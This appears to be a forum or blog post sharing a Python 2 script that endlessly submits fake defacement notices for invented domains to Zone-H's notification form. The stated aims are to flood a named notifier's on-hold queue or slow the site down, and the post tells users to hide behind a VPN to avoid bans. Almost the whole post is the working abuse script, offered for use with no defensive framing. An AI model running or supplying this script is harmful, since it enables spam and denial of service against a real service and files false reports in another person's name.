Below goes the codes for notifying fake domains for infinite times(use VPN if you do not like to get stamped by Zone-H admin) in Zone-H (if you like to flood someone’s onhold or slow down zone-h
:P )
[!] Before you continue, install the requests module in your python.
import requests
num = 0
while True:
Notifier = "TheRobot007"
Domain = "http://www.something" + str(num) + ".com"
with requests.Session() as c:
print 'Submitting', Domain, 'as', Notifier, '...'
url = 'http://www.zone-h.org/notify/single'
c.get(url)
post_data = dict(defacer=Notifier, domain1=Domain, hackmode=1, reason=1)
c.post(url, data=post_data, headers={"Referer": "http://www.zone-h.org/"})
num += 1
print "Bot attempt :%d" % num
Code output screen
the usage of this script is too simple
:)
Notifier = "TheRobot007" is the name of the notifier you would like to flood as.
Enjoy
:D